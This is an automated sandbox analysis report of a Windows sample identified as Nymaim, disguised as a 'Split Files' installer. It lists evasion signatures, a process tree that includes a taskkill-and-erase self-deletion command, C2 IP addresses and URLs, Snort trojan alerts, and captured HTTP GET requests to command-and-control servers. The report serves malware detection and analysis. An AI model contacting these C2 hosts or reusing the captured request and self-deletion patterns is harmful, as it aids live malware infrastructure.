Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 778228
MD5: e0f8085c7cb8eb9cf1c263bb12cfc6df
SHA1: a109ebcf251a1e69923c60330994190e40ab466c
SHA256: a28fb531e91695081ac9a3a08bd9be333462f84a3b1e9de81dda94869fd3d32a
Tags: exe

Detection

Nymaim
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Nymaim
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Found evasive API chain checking for process token information
Uses taskkill to terminate processes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to detect sandboxes (foreground window change detection)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 5340 cmdline: C:\Users\user\Desktop\file.exe MD5: E0F8085C7CB8EB9CF1C263BB12CFC6DF)
    • is-6A80U.tmp (PID: 5356 cmdline: "C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp" /SL4 $203A8 "C:\Users\user\Desktop\file.exe" 1818498 170496 MD5: E8176050192FBB976D70238E3C121F4C)
      • SplitFiles131.exe (PID: 5404 cmdline: "C:\Program Files (x86)\Split Files\SplitFiles131.exe" MD5: 361518D6CC3C25EEC2DFC1DE82B055B2)
        • cmd.exe (PID: 4988 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "SplitFiles131.exe" /f & erase "C:\Program Files (x86)\Split Files\SplitFiles131.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • taskkill.exe (PID: 5172 cmdline: taskkill /im "SplitFiles131.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
  • cleanup
{"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}
Yara matches in memory dumps

Source | Rule | Description | Author | Strings
00000002.00000002.338322825.0000000003370000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
00000002.00000002.338187863.0000000003130000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
00000002.00000002.337441362.0000000000400000.00000040.00000001.01000000.00000007.sdmp | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |

Yara matches in unpacked PE files

Source | Rule | Description | Author | Strings
2.2.SplitFiles131.exe.3370000.3.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
2.2.SplitFiles131.exe.3370000.3.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
2.2.SplitFiles131.exe.400000.0.raw.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |
2.2.SplitFiles131.exe.400000.0.unpack | JoeSecurity_Nymaim | Yara detected Nymaim | Joe Security |

No Sigma rule has matched
Snort IDS alerts

Timestamp: 01/05/23-08:47:10.017687
Source IP: 107.182.129.235
Destination IP: 192.168.2.5
SID: 2852925
Source Port: 80
Destination Port: 49706
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 01/05/23-08:47:09.800462
Source IP: 192.168.2.5
Destination IP: 45.139.105.171
SID: 2041920
Source Port: 49705
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 01/05/23-08:47:09.990287
Source IP: 192.168.2.5
Destination IP: 107.182.129.235
SID: 2852981
Source Port: 49706
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 01/05/23-08:47:09.925610
Source IP: 192.168.2.5
Destination IP: 107.182.129.235
SID: 2852980
Source Port: 49706
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: http://107.182.129.235/storage/extension.php2 | URL Reputation: Label: malware
Source: http://171.22.30.106/ | URL Reputation: Label: malware
Source: http://171.22.30.106/library.php | URL Reputation: Label: malware
Source: http://107.182.129.235/storage/extension.phpr | Avira URL Cloud: Label: malware
Source: http://171.22.30.106/u | Avira URL Cloud: Label: malware
Source: http://171.22.30.106/library.phpT | Avira URL Cloud: Label: malware
Source: http://107.182.129.235/storage/ping.phpS | Avira URL Cloud: Label: malware
Source: http://171.22.30.106/n | Avira URL Cloud: Label: malware
Source: http://171.22.30.106/library.php4 | Avira URL Cloud: Label: malware
Source: http://107.182.129.235/storage/extension.phpz | Avira URL Cloud: Label: malware
Source: http://171.22.30.106/library.phpT | Virustotal: Detection: 8%
Source: http://107.182.129.235/storage/extension.phpr | Virustotal: Detection: 15%
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe | ReversingLabs: Detection: 50%
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Joe Sandbox ML: detected
Source: 2.2.SplitFiles131.exe.10000000.5.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.0.file.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: 0.2.file.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2
Source: 2.2.SplitFiles131.exe.3370000.3.raw.unpack | Malware Configuration Extractor: Nymaim {"C2 addresses": ["45.139.105.1", "85.31.46.167", "107.182.129.235", "171.22.30.106"]}
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_10001000 ISCryptGetVersion,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_10001130 ArcFourCrypt,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy,

Compliance

Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Unpacked PE file: 2.2.SplitFiles131.exe.400000.0.unpack
Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_0046CA68 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00474A14 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_0045157C FindFirstFileA,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_0045E244 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_0048AC5C FindFirstFileA,6D2969D0,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_00472CD4 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_0045CDA4 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp | Code function: 1_2_0045DEB0 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00423E2D FindFirstFileExW,
Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_1000959D FindFirstFileExW,
Source: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\2v3Q9V1aRpd.exe | Code function: 3_2_01314A1A FindFirstFileExW,
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp\

Networking

Source: Traffic | Snort IDS: 2041920 ET TROJAN GCleaner Downloader Activity M8 192.168.2.5:49705 -> 45.139.105.171:80
Source: Traffic | Snort IDS: 2852980 ETPRO TROJAN Win32/Fabookie.ek CnC Request M1 (GET) 192.168.2.5:49706 -> 107.182.129.235:80
Source: Traffic | Snort IDS: 2852981 ETPRO TROJAN Win32/Fabookie.ek CnC Request M3 (GET) 192.168.2.5:49706 -> 107.182.129.235:80
Source: Traffic | Snort IDS: 2852925 ETPRO TROJAN GCleaner Downloader - Payload Response 107.182.129.235:80 -> 192.168.2.5:49706
Source: Malware configuration extractor | IPs: 45.139.105.1
Source: Malware configuration extractor | IPs: 85.31.46.167
Source: Malware configuration extractor | IPs: 107.182.129.235
Source: Malware configuration extractor | IPs: 171.22.30.106
Source: Joe Sandbox View | ASN Name: CMCSUS
Source: Joe Sandbox View | IP Address: 45.139.105.171
Source: unknown | TCP traffic detected without corresponding DNS query: 45.139.105.171
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/
Source: SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000002.338008683.0000000001823000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.182.129.235/storage/extension.php
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.php2
                Source: SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.phpC&
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000002.338008683.0000000001823000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.phpO
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.phpr
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.phpu
                Source: SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/extension.phpz
                Source: SplitFiles131.exe, 00000002.00000002.337974221.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/ping.php
                Source: SplitFiles131.exe, 00000002.00000002.337974221.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235/storage/ping.phpS
                Source: SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.182.129.235ibrary.php
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/
                Source: SplitFiles131.exe, 00000002.00000003.292604795.000000000184A000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.php
                Source: SplitFiles131.exe, 00000002.00000002.337974221.0000000001802000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.php4
                Source: SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/library.phpT
                Source: SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://171.22.30.106/n
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://171.22.30.106/u
                Source: SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.139.105.171/
                Source: SplitFiles131.exe, 00000002.00000002.337920488.000000000175A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte
                Source: is-6A80U.tmp, 00000001.00000002.340287748.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339273052.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-61K5M.tmp.1.dr, is-3OLEK.tmp.1.dr | String found in binary or memory: http://rus.altarsoft.com/split_files.shtml
                Source: is-6A80U.tmp, 00000001.00000002.340287748.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339273052.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-7HLEL.tmp.1.dr, is-B5MB3.tmp.1.dr, is-E35J6.tmp.1.dr, is-AFEG0.tmp.1.dr, is-CSEUG.tmp.1.dr, is-OOV97.tmp.1.dr, is-7R5M5.tmp.1.dr, is-2PF6K.tmp.1.dr, is-FNEKR.tmp.1.dr, is-7QVA3.tmp.1.dr | String found in binary or memory: http://www.altarsoft.com/split_files.shtml
                Source: file.exe | String found in binary or memory: http://www.innosetup.com
                Source: is-6A80U.tmp, is-6A80U.tmp, 00000001.00000002.339309119.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.dr | String found in binary or memory: http://www.innosetup.com/
                Source: file.exe, 00000000.00000003.249290650.00000000023A9000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.249555772.00000000021CD000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339420924.00000000004C4000.00000002.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.dr | String found in binary or memory: http://www.innosetup.comDVarFileInfo$
                Source: file.exe, 00000000.00000003.249157773.0000000002300000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.249345408.0000000002128000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, is-6A80U.tmp, 00000001.00000002.339309119.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/?ps
                Source: file.exe, 00000000.00000003.249157773.0000000002300000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.249345408.0000000002128000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339309119.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/?psU
                Source: C:\Program Files (x86)\Split Files\SplitFiles131.exe | Code function: 2_2_00401B30 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,
                Source: global traffic | HTTP traffic detected:
                    GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                    Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                    Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                    User-Agent: 1
                    Host: 45.139.105.171
                    Connection: Keep-Alive
                    Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected:
                    GET /storage/ping.php HTTP/1.1
                    Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                    Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
